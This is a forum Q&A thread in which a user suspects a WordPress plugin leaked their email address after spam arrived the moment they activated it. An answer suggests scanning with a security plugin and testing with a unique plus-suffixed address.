0

After activating a plugin I received an email that I had never recived before. What kind of miscellaneous code it might be? it's a coincidence? I received an email to my account Gmail that I never used on my VPS (not sure) and I am sure that I never used it on the website where I activated a plugin. But I activated the plugin exactly at 1:03 and I received SPAM (with pdf and link inside pdf) exactly at 1:03. I blocked using the root user years ago. I am using admin user of VestaCP.

My question is how can I scan WordPress plugin for malware or miscellaneous code or malware? I tried uploading zip with the plugin on virustotal but nothing was found. I need some help before I reinstall my VPS and all my websites.
Thank you

phtshw
  • 1

1 Answers1

0

There are many WordPress plugins that offer malware scanning as part of their functionality, for example Wordfence.

I'd recommend trying to reproduce the issue with a unique email address in order to gain more certainty. Set up a fresh WordPress site, activate the plugin, and this time use the + suffix trick to create a unique email address like example+spamtest@gmail.com where your normal address is example@gmail.com. If you get a spam email to that unique email address, then you can be reasonably certain that the spam is correlated to entering the address into the plugin form.

sceox
  • 1
  • 2